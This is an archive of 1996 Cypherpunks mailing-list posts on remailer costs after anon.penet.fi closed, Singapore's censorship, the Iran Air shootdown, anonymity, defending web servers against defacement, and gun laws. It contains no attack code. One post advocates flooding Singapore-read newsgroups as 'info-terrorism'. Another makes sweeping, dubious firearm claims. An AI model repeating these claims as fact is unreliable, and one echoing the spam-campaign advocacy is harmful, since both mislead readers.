That the U.S. demands trials for alleged terrorists while having no trial
for Captain Rogers is further evidence of hypocrisy. (A military court
martial and a firing squad for those found guilty might have sent a more
consistent message.)

Make no mistake about it: I cannot support the sending of American gunboats
to the backyards of other countries merely for perceived notions about
American rights to their oil. Hopefully, as crypto anarchy spreads,
imperialism such as this will be undermined, destabilized, and ultimately
be defeated.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Mon, 2 Sep 1996 02:56:04 +0800
To: paul@fatmans.demon.co.uk
Subject: Re: anon.penet.fi: URGENT REQUEST
In-Reply-To: <841590548.16439.0@fatmans.demon.co.uk>
Message-ID: <Pine.GSO.3.93.960901195715.2418A-100000@nebula>
MIME-Version: 1.0
Content-Type: text/plain


 Sun, 1 Sep 1996 paul@fatmans.demon.co.uk wrote:

> I don`t know what the response to this will be, I need approximately 
> 5000 UK pounds to set up such an operation (Yes, a leased line really 
> does cost that much in the UK) and then a monthly income of around 
> 3000 UK pounds.

I remember the load on anon.penet.fi was something like 7500 messages
daily. As for connection, you will need 64kbps line or even less in case
you compress the messages. The machine could be either an older Sun Sparc
or a PC running free Unix (Linux/FreeBSD/...)

Here in Estonia 64kbps costs between 400-600 USD per month, machine would
be something like 1000-2000 USD. Still I believe someone setting up a
remailer should do so for free, from their own or company resources. The
best way would be every ISP to set up their own remailers and nym servers. 

Jüri Kaljundi
AS Stallion
jk@stallion.ee





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Burrell <jburrell@crl.com>
Date: Mon, 2 Sep 1996 10:19:04 +0800
To: cypherpunks@toad.com
Subject: Re: anon.penet.fi: URGENT REQUEST
Message-ID: <199609020012.UAA12054@spirit.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> ! on a dedicated 28.8 PPP line. The cheapest used VGA display from 
> ! the nearby waste dump will work just fine. 
> 
> Hell, any monitor should work!  I'm curious about how to go about 
> acquiring one of those huge 100+ x 100+ charactor terminals that linux 
> supports.  Is it practical, cheap and readable?

If you mean something like a 132x60 character terminal, you can get a
utility from Sunsite called SVGATextMode which will do that for you on a
standard VGA monitor, provided you have a graphics card which supports such 
a mode. I have an STB Nitro 2MB ISA card, and am running a 132x60 mode on a
14 inch monitor.

> ln -s /dev/null /usr/postmaster
> ln -s /dev/null /usr/abuse

I think you mean /usr/spool/mail/postmaster, but I could be wrong. ;)

> That should filter the mail quite nicely!  :->

Indeed. :)
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMiombioZzwIn1bdtAQFDUQF/drCreJbjZxyLz2rMirboSzv77W/dW/9Q
k1BMBvpx9+5R39MP+bUHEJQ65UhDskV6
=Eacf
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 2 Sep 1996 11:24:03 +0800
To: jseng@pobox.org.sg (James Seng)
Subject: Re: DON'T Nuke Singapore Back into the Stone Age
In-Reply-To: <Pine.BSF.3.91.960902061444.12103A-100000@icg.irdu.nus.sg>
Message-ID: <199609020116.UAA01684@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


James Seng wrote:
> 
> On Sat, 31 Aug 1996, Timothy C. May wrote:
> > The point is to make clear to them that the Usenet and similar Web sites
> > are global in nature, not subject to censorship without a very high local
> > cost. If discussions of Lee Kwan Yew's dynasty are considered illegal, then
> > Singaporans will have to choose not to carry the various newsgroups into
> > which *I* post such messages!
> 
> Just let to add my comment in regard to this unforuntate discusssion.
> 
> To understand the sitution better, you should not impose America 
> idealogy and perspection on how things to be done to Singapore. Singapore 
> maybe young but there are certain culture too.
> 
> Most importantly, the move to censor certain WWW site actually comes as a 
> relieve to many people, especially parents who worried about the bad 
> influence of it. We can go into the same discussion about whose 
> responsibilty it is but before you do that, please bear in mind that this 
> is Singapore.

America is much less different from Singapore in that respect than
you might think.

igor




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 2 Sep 1996 13:43:55 +0800
To: cypherpunks@toad.com
Subject: Let's Nuke Singapore Back into the Stone Age
Message-ID: <ae4fa048030210045de0@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:41 AM 9/2/96, Arun Mehta wrote:
>At 10:35 31/08/96 -0700, Timothy C. May wrote:
>
>> If discussions of Lee Kwan Yew's dynasty are considered illegal, then
>>Singaporans will have to choose not to carry the various newsgroups into
>>which *I* post such messages!
>
>How long do you propose to carry on doing that? Soon, the others
>in the newsgroups will be asking you very impolitely to stop,
>just as you would if someone kept on and on posting such stuff to cypherpunks.

Actually, we already have several examples of how this worked, including
some cases I was directly involved in. During the Teale-Homulka trial in
Canada, many of us (me, too) posted numerous articles about it to the
various *.canada newsgroups, such as soc.culture.canada. Canada had the
choice of instructing all ISPs to halt the *.canada newsgroups. There were
no real complaints that I recall about messages being "off-topic," as they
clearly were very much on-topic. (Not that a few complaints have ever
stopped me. While I don't spam newsgroups with auto-generated spam, I
figure any article I take the time to actually write and that deals with
the newsgroup involved, by my own standards, is fair game. My ISP can
cancel my account if he feels I have spammed newsgroups in some way.)

My proposal is not to post anti-Singapore screeds to comp.lang.java or the
like, but to post them to various groups Singaporans and their neighbors
might read. If Singapore wishes to disconnect itself from
soc.culture.singapore, this is there choice. Then, the attack can spread to
various other groups Singaporans might want to read....

(I call this a _good_ use of "info-terrorism.")

...
>True, but Usenet only functions because it works most of the
>time. To the extent we subvert this consensus, we damage Usenet,
>make it less useful. It shouldn't happen that in trying to save
>or spread Usenet, we have to destroy it...

Posting the Homulka stuff did not kill the Usenet. Posting the autopsy
photos of Nicole Brown Simpson did not kill the Usenet. Posting the innards
of RSA Data Security algorithms did not kill the Usenet. If Canker and
Sludgewell spam cannot kill the Usenet, if "Make Money Fast" noise cannot
kill the Usenet, and if "Babes will fuck 4 U" posts cannot kill the Usenet,
then surely some informative posts about the fascist Yew posted to various
newsgroups of relevance to Singaporans and Asians will not kill the Usenet!

>>And _never_ has it involved determinations of "inappropriate" by
>>_governments_!
>
>There I'm with you -- I'm merely suggesting that you find a way
>to protest Singapore's actions in a manner that would be less
>objectionable to most Internet users, in Singapore and outside.

Why? What is "objectionable" about exposing the truth about Lee Kwan Yew,
his feeble son, and their dynasty? What is "objectionable" about teaching
them how to use Web proxies, remailers, and other tools of liberty?

If the citizens find this stuff objectionable, they can simply not read the
stuff! As with books, movies, and magazines. What could be more natural
than this?

But of course it is the _rulers_ of these Asian kingdoms and satrapies
which want the distribution of certain thoughts controlled and denied to
their serfs and citizen-units.

--Tim May


We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrickbc@juno.com (patrick b cummings)
Date: Mon, 2 Sep 1996 10:42:20 +0800
To: lacc@suburbia.net
Subject: No Subject
Message-ID: <19960831.193316.9134.18.patrickbc@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


what do you know about hackers




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Angelos D. Keromytis" <angelos@gradin.cis.upenn.edu>
Date: Mon, 2 Sep 1996 10:50:32 +0800
To: edyson@edventure.com (Esther Dyson)
Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi
In-Reply-To: <19960901220323595.AAA208@Esther.edventure.com>
Message-ID: <199609020051.UAA14557@gradin.cis.upenn.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


In message <19960901220323595.AAA208@Esther.edventure.com>, Esther Dyson writes
:
>Now, speaking personally: I believe there are trade-offs -- which is what I
>told the LA Times.  I assume I was quoted accurately (although the word
>"enforce" is awkward), but out of context.   Anonymity can be dangerous --
>as can traceability, especially in/by repressive regimes.  Therefore I would
>favor allowing anonymity -- with some form of traceability only under terms
>considerably stronger than what are generally required for a wiretap.
>Anyone who seriously needs anonymity because of a repressive government is
>likely to use a foreign (outside whatever jurisdiction he fears) server, so
>that this is not a matter of "local" laws.  The tracer would have to pass
>through what I hope would be tighter hoops than we have now.  
>
Just a small parenthesis at this point: traceability can be dangerous
even in non-repressive regimes; there is information about oneself
which, although far from illegal or "top secret", is not exactly for
the whole world to know; this sort of information includes, but is not
limited to, financial transactions, product preferences, habbits,
hobbies etc.

My feeling is that it's better to devise ways to prevent a digital
crime (for lack of better term) than try to find and punish the
culprit(s).

Of course, this applies to SOME services (i don't expect anonymous
contracts to become very popular), for which anonymity makes sense.
But the infrastructure has to be there, IMNSHO. 
Just my $0.02 (+tax). 
- -Angelos

PS. An interesting thing to consider is whether traceability in a
service should be inherent to it or enforced by policy.
-----BEGIN PGP SIGNATURE-----
Version: 2.6
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCUAwUBMiovkL0pBjh2h1kFAQEt4wP4iBUomLacEjyTkrwme+0OjQnVcd+/Lok0
2l1tnNed/CgvgF5gHRoylWPK42HmmQ6vzWqsdihrTR9YWy/eQIT1W6VHoD/b0pBD
aG7pXhy39aAHaMItIS8+3THcWhkcVLVEU/xk8nTyfm325OC7G9O25/EoRu80wr/N
mtezdUBRUw==
=Z5U4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 2 Sep 1996 14:05:56 +0800
To: wb8foz@nrk.com
Subject: Re: Moscowchannel.com hack
Message-ID: <199609020357.UAA18140@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:23 PM 9/1/96 -0400, David Lesher wrote:
>> > Write your web site to a CD-ROM and hard-code the base directory into the
>> > webserver.
>> A hacker who has root can forcibly unmount the cdrom and mount another
>> directory on that node. Not a good solution.

>Real hard disks such as RL02's & RK07's have WRITE DISABLE
>switches....

Many modern SCSI drives have them also, though you may need
to connect a switch to the appropriate jumpers.  In Hugh Daniel's
copious spare time, he's been working on hacking *bsd Unix
to cope with a write-protected root drive (you mainly need to set up
the swap partition and anything that needs writing in on a separate
drive and build lots and lots of symlinks for random logfiles.)

RM05s also let you connect them to two computers, though it was
a really bad idea to tell both computers to mount them as writeable,
since they'd scribble over the superblocks.  (This was more useful
before Ethernets became widely supported, since you could blaze away
at full MASSBUS and/or disk speed instead of 19.2kbps UUCP.)
You can play the same games with SCSI today, if you're careful.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Reassign Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 2 Sep 1996 14:16:09 +0800
To: Simon Spero <alanh@infi.net>
Subject: Re: FLT 800: From the Rumor Mill...But It Makes Sense.. (fwd)
Message-ID: <199609020358.UAA05172@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:15 PM 9/1/96 -0400, Simon Spero wrote:
>On Sun, 1 Sep 1996, Alan Horowitz wrote:
>
>> The Aegis ship in the Gulf wzs not in an exercise. It was in a war zone.
>> 
>> If my memory serves, the Iranian jetliner had its squawker turned off, or 
>> broken. The officer in charge in the CIC had about ten seconds to decide 
>> if he was about to be locked-on by a missle. And no real information to 
>
>I think it was actually a combination of a design flaw in the user 
>interface for the control system combined with a human error that led to 
>the radar officer confusing the airbus with an (F4?) a hundred miles away 
>that he'd previously clicked on. 


Isn't there just the tiniest bit of a double-standard here?  If the ship was 
supposedly "justified" in firing on an airplane just because it 
_could_become_ a threat, and _could_ fire a missile at any moment, then why 
can't we turn this logic around and claim that an Iranian aircraft could 
view an Aegis as a ship which "could become a threat" and "could fire a 
missile at any moment."

Generally, I'm not sympathetic to the Iranians; far from it.  But I can 
smell hypocrisy a mile away and the US military's "logic" in this area is 
unbelievable.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Mon, 2 Sep 1996 11:01:31 +0800
To: "Angelos D. Keromytis" <angelos@gradin.cis.upenn.edu>
Subject: Re: FLT 800: From the Rumor Mill...But It Makes Sense.. (fwd)
In-Reply-To: <199609011605.MAA26536@gradin.cis.upenn.edu>
Message-ID: <Pine.SV4.3.91.960901205930.2611B-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


The Aegis ship in the Gulf wzs not in an exercise. It was in a war zone.

If my memory serves, the Iranian jetliner had its squawker turned off, or 
broken. The officer in charge in the CIC had about ten seconds to decide 
if he was about to be locked-on by a missle. And no real information to 
make the decision with.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 2 Sep 1996 14:13:19 +0800
To: cypherpunks@toad.com
Subject: RE: Desubscribe
In-Reply-To: <199609011607.JAA22532@dns1.noc.best.net>
Message-ID: <4wsLTD44w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"James A. Donald" <jamesd@echeque.com> writes:

> > > deserves to be shipped to sweden where they shall be
> > > made into cheese by nuns.
>
> At 04:40 PM 9/1/96 DST, Johnny Eriksson wrote:>
> > No thanks, we do not want them.
>
> You are Swedish?
>
> I heard on talk.politics.guns somebody say that in Sweden they
> had banned knives with a sharp point at the end, and were going
> to ban sharp knives altogether.  I think he was just engaging in
> hyperbole, that he really meant that gun control in Sweden was
> unreasonably strict, but on reflection I am not sure.

I heard from a reliable source that the Swedish bikini team opposes GAK.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Angelos D. Keromytis" <angelos@gradin.cis.upenn.edu>
Date: Mon, 2 Sep 1996 11:25:38 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: FLT 800: From the Rumor Mill...But It Makes Sense.. (fwd)
In-Reply-To: <Pine.SV4.3.91.960901205930.2611B-100000@larry.infi.net>
Message-ID: <199609020111.VAA15203@gradin.cis.upenn.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


In message <Pine.SV4.3.91.960901205930.2611B-100000@larry.infi.net>, Alan Horow
itz writes:
>The Aegis ship in the Gulf wzs not in an exercise. It was in a war zone.
>
>If my memory serves, the Iranian jetliner had its squawker turned off, or 
>broken. The officer in charge in the CIC had about ten seconds to decide 
>if he was about to be locked-on by a missle. And no real information to 
>make the decision with.

There's still the possibility that something malfunctioned (but not
fatal - otherwise - for the plane). I'm not
saying it's what happened, but it's a distant possibility.
- -Angelos

-----BEGIN PGP SIGNATURE-----
Version: 2.6
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAwUBMio0Kr0pBjh2h1kFAQEHHgQAnRl8UhCE+VMQc522VK5wM1onihgI0TMg
6O5tE+b7VRjuT71X8NabxTcoHqs2bePmTbcof62lAJfS61cZNfCuiEO+Pl7Xg/pg
bqcLtwB8BJqAIluFt9s5kAXK2MxHJrZYDKc1ORkH0C4BqkRuYN09zNYuZ1+YegH6
TfYXEnNKC9s=
=BjDI
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 2 Sep 1996 11:35:19 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Conservation Laws, Money, Engines, and Ontology
In-Reply-To: <ae4e1b2601021004a736@[207.167.93.63]>
Message-ID: <199609020218.VAA25795@homeport.org>
MIME-Version: 1.0
Content-Type: text


	Tim raises some interesting points, I'd like to focus in on
one small section, that of controlling what software runs on a
machine.

	I have no issue with a user choosing the software that runs,
but lets consider the Microsoft CAPI model.  In it, there is control
over what runs, but it exists at the vendor level.  This is moving
away from the personal computer, and back to the timeshare model,
where control over what you run is partially in the hands of the
vendor.  Giving up this control of your computer is a step in a
dangerous direction.

	However, creating 'execution kernels' with cryptographic
authentication and resource controls is something that would be very
useful in a number of places.  Tim's selling of CPU cycles, stamps and
the like dovetails with something I wrote last December
(www.homeport.org/~adam/java.html) on the need for granular controls
in Java execution.

	So, I'm in agreement that we need resource allocation
controls, and I want to stress the need for those controls to be
configured by the owner of the computer, not the author of an
operating system, or by government policies.

	When they buy me a computer, they can decide what runs on it.

Adam


Timothy C. May wrote:

| Now, certainly I support the right of any person or machine to run programs
| freely and without charge, to pass on e-mail free of charge, to run
| remailers for no charge, to accept spam mail without complaint, and so on.
| 
| What I'm suggesting is that many of the problems being seen with overuse of
| resources, spam, congestion, and denial of service are really due to a poor
| model of resource allocation. Unix and other modern operating systems offer
| various tools for helping to constrain such problems, but, I submit, better
| methods are needed.

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: matthew@itconsult.co.uk (Matthew Richardson)
Date: Mon, 2 Sep 1996 06:18:06 +0800
To: paul@fatmans.demon.co.uk
Subject: Re: anon.penet.fi: URGENT REQUEST
In-Reply-To: <841590548.16439.0@fatmans.demon.co.uk>
Message-ID: <memo.960901212105.238A@itconsult.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> I don`t know what the response to this will be, I need approximately 
> 5000 UK pounds to set up such an operation (Yes, a leased line really 
> does cost that much in the UK) and then a monthly income of around 
> 3000 UK pounds.

I have looked into UK line costs recently and I suspect that the 
suggested costs do sound perhaps a little high.  Although the set up 
cost is probably OK, I would suggest that the running costs (assuming 
that these comprise the circuit charge and payment to an ISP) could 
be less that half that quoted.  What you have been quoted may well 
depend on who you have spoken to.

Best wishes,
Matthew

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAgUBMinwBAKwLwcHEv69AQHoGgQAllNK8eXKM6SsNmlnGBmriCklhfI9RZzC
GlgtWvTvzsN5j/qoBpWwN4K+fn+HfLScPjQ0rIB50sPTG3E53i4GDsUcTHIQEYKP
aNaaiS6ZQKtu2VCBzyyrM5UBoAqronLbBjl3U9C0UDQZ0jdaCUpVWM5qSZikGYTO
5GAWvbp5oq0=
=6ZDW
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrickbc@juno.com (patrick b cummings)
Date: Mon, 2 Sep 1996 11:22:30 +0800
To: hackerpunks@alpha.c2.org
Subject: No Subject
Message-ID: <19960831.201554.9134.24.patrickbc@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Please send me information on hacking bbs
    
    Hackmaster-p
    Patrickbc@juno.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 2 Sep 1996 14:39:54 +0800
To: cypherpunks@toad.com
Subject: Free Speech and List Topics
Message-ID: <ae4fb1c304021004792c@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:19 AM 9/2/96, Mark M. wrote:

>On Mon, 2 Sep 1996, James Seng wrote:

>> ps: Sorry for the off-topic discussion.
>
>Cpunks is certainly not the best place to be discussing free speech.  However,
>the link between free speech and the spread of cryptographic technology is too
>close to completely overlook.

I think it is as good a place as any to discuss free speech. The issues
surrounding Net censorship, Singapore, the CDA, Germany, the shutdown of
Julf's server, etc., are central to our concerns.

And, in fact, it is "cypherpunk technology" which will have a more lasting
effect on these issues than mere talking about it in some "free speech
discussion group" will have.

More disturbing to me recently has been the steady increase in subscribers
to this list who don't seem to value free speech very highly, who write of
their own nation's censorship as valiant efforts to protect citizen-units
from foreign devils, and, even more shockingly, from supposed defenders of
electronic freedom who are now talking about the need for limits on
anonymity.

With friends like those...

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman OBC)
Date: Mon, 2 Sep 1996 14:52:15 +0800
Subject: Silenced Machine Guns Are Safer Than TWA
Message-ID: <199609020433.VAA29977@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! "James A. Donald" <jamesd@echeque.com>, writes:
! >I heard on talk.politics.guns somebody say that in Sweden they
! >had banned knives with a sharp point at the end, and were going
! >to ban sharp knives altogether.  I think he was just engaging in
! >hyperbole, that he really meant that gun control in Sweden was
! >unreasonably strict, but on reflection I am not sure.
! >
! 
! In a survey conducted in Sweden a few years ago, 50% of Swedish
! households had access to guns (generally military service weapons
! and sporting shotguns). Guns are, however, licensed and regulated,
! and seldom used in crimes. Licenses for "personal protection" are
! almost unobtainable. At least one military officer was court martialed
! when his service revolver was stolen from his automobile.
! 
! The most significant "mass murderer" crimes in Sweden (one last
! year and one in the 1970's) were caused by people who used their
! legally-obtained military weapons.

Hundreds of thousands of private American citizens legally own machine 
guns, silencers, live hand grenades, .75 caliber machine guns, etc.
Perhaps 40% or so of the populace lives in an area without significantly
higher regulations concerning such than the federal, which is not that 
bad.  There is no federal law making silenced machine guns substantially 
more difficult to purchase and shoot than ordinary handguns.  The feds 
certainly don't require training or any other similar requirement.  
Contrary to popular fiction, ALL firearms have been permanently 
registered since the 1968 Gun Control Act.  The media monopoly lies when 
they say the contrary.

How many firearm crimes were committed by these hundreds of thousands of 
ordinary untrained destructive weapon owners with their destructive 
weapons in the entire span of 1980-1996?  *NONE*!  THEREFORE, everyone in 
Sweden and America should be allowed to own silenced machine guns without 
any greater than the usual restrictions.

BTW, I muse that the issue of guns, drugs and censorship make an 
excellent litmus test for libertarians: either you support the 
legalization of, all of, or your a fake.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman OBC)
Date: Mon, 2 Sep 1996 15:18:23 +0800
Subject: http://infinity.nus.sg/cypherpunks/
Message-ID: <199609020450.VAA02140@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Someone keeps asking for the filtered cypherpunks archive:

http://infinity.nus.sg/cypherpunks/

It's filtered with hypermail and is lynx friendly.
It's easiest to read by choosing the link to filter by subject.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Mon, 2 Sep 1996 15:24:20 +0800
To: "Alan Olsen" <charlee@netnet.net>
Subject: Re: WARNING vIRuS!
Message-ID: <19960902051255234.AAA172@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 31 Aug 1996 23:41:58 -0700, Alan Olsen wrote:

>>        There is a new and VERY dangerous virus called the HAZ-MAT virus!

>This is the clueless kind of crap I expect pitched to AOL users and upper
>level management.

>The only way that you could obtain the effects described above is with Black
>Magic and/or Voodoo.  (And not even then.)
>
>I remember a similar hoax going around about 3-4 years ago about viruses in
>image files.  I guess nothing on the net is ever forgotten entirely.
>Especially the urban legends and bullshit.

You ever notice how that is?  People *never* remember things like "You have to
execute something to get a virus".  They *always* remember something like "Good
Times."   Reminds me of the guy who said you could stick all sorts of sensitive
data in README.TXT because you can be sure nobody will look in there.

- "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said.
* Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 2 Sep 1996 12:45:14 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: FLT 800: From the Rumor Mill...But It Makes Sense.. (fwd)
In-Reply-To: <Pine.SV4.3.91.960901205930.2611B-100000@larry.infi.net>
Message-ID: <Pine.SUN.3.91.960901221001.15978A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 1 Sep 1996, Alan Horowitz wrote:

> The Aegis ship in the Gulf wzs not in an exercise. It was in a war zone.
> 
> If my memory serves, the Iranian jetliner had its squawker turned off, or 
> broken. The officer in charge in the CIC had about ten seconds to decide 
> if he was about to be locked-on by a missle. And no real information to 

I think it was actually a combination of a design flaw in the user 
interface for the control system combined with a human error that led to 
the radar officer confusing the airbus with an (F4?) a hundred miles away 
that he'd previously clicked on. 



-----
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman OBC)
Date: Mon, 2 Sep 1996 16:07:36 +0800
Subject: Re: Free Speech and List Topics
In-Reply-To: <ae4fb1c304021004792c@[207.167.93.63]>
Message-ID: <199609020517.WAA06504@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! At 3:19 AM 9/2/96, Mark M. wrote:
! 
! >On Mon, 2 Sep 1996, James Seng wrote:
! 
! >> ps: Sorry for the off-topic discussion.
! >
! >Cpunks is certainly not the best place to be discussing free speech.  However,
! >the link between free speech and the spread of cryptographic technology is too
! >close to completely overlook.
! 
! I think it is as good a place as any to discuss free speech. The issues
! surrounding Net censorship, Singapore, the CDA, Germany, the shutdown of
! Julf's server, etc., are central to our concerns.
! 
! And, in fact, it is "cypherpunk technology" which will have a more lasting
! effect on these issues than mere talking about it in some "free speech
! discussion group" will have.
! 
! More disturbing to me recently has been the steady increase in subscribers
! to this list who don't seem to value free speech very highly, who write of
! their own nation's censorship as valiant efforts to protect citizen-units
! from foreign devils, and, even more shockingly, from supposed defenders of
! electronic freedom who are now talking about the need for limits on
! anonymity.

How about supporting the effort for comp.cypherpunks ?

About the need for limits for anonymity, guess what brought that on?
Crime?  Yes!  The crime of the media monopoly violating the anti-trust
acts, because people are ignorant enough to trust the mass media for
their news.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Mon, 2 Sep 1996 15:56:55 +0800
To: "patrickbc@juno.com>
Subject: Re: hackers texts
Message-ID: <19960902051749062.AAA212@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 01 Sep 1996 08:51:36 EDT, patrick b cummings wrote:

>If any of you hackers out their have wrote any texts for beginning
>hackers  or know of any please send them to me at patrickc@juno.com

You know, I think his mail server has a 36 hour delay on incoming messages. 
Either that or he's
Roadkill on the Information Superhighway
                     //  \\
                    //    \\            ______________
		   //	   \\          |              |
                  //        \\         | Information  |
                 //          \\        | Superhighway |
                //   ____     \\       |     56MB/s   |
               //   /____\     \\      |______________|
              //   |==__==|     \\           | |
             //    ~||~~||~      \\          | |
            //         '          \\         | |
           //         //           \\        | |
          //                        \\       | |
         //          / /             \\      | |
        //                            \\     | |
       //           ///                \\    | |
      //                                \\   | |
     //         . ,&                     \\  | |
    //       . `;//*          IS HERE     \\ 
   //       .  `|/^\@'< ' .       |        \\
  //          `_/x@=%$P/,',   <---/         \\
 //            >@#)*?o$%( ,                  \\
//              \.X#j~\===B                   \\
/                                              \\
     : The Clue truck got him...

[In case you haven't noticed yet, this looks best with a non-proportional font]

- "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said.
* Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Mon, 2 Sep 1996 16:07:08 +0800
To: "Igor Chudov" <snow@smoke.suba.com>
Subject: Re: Moscowchannel.com hack
Message-ID: <19960902051921875.AAA201@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 1 Sep 1996 10:09:32 -0500 (CDT), Igor Chudov @ home wrote:

>> > Not really crypto, but related to the DOJ hack in a way.
>> > 
>> > Moscow Channel is a pretty slick, Russian news/commentary >>page.  Their Web
>> > site was hacked and altered by someone who didn't seem to >>like Russians all
>> > Just a matter of time before some builds a dedicated Satan >>type tool that
>> > scans for  HTTP server holes or messed up file permissions >>to make locating
>> > potential victims easy.
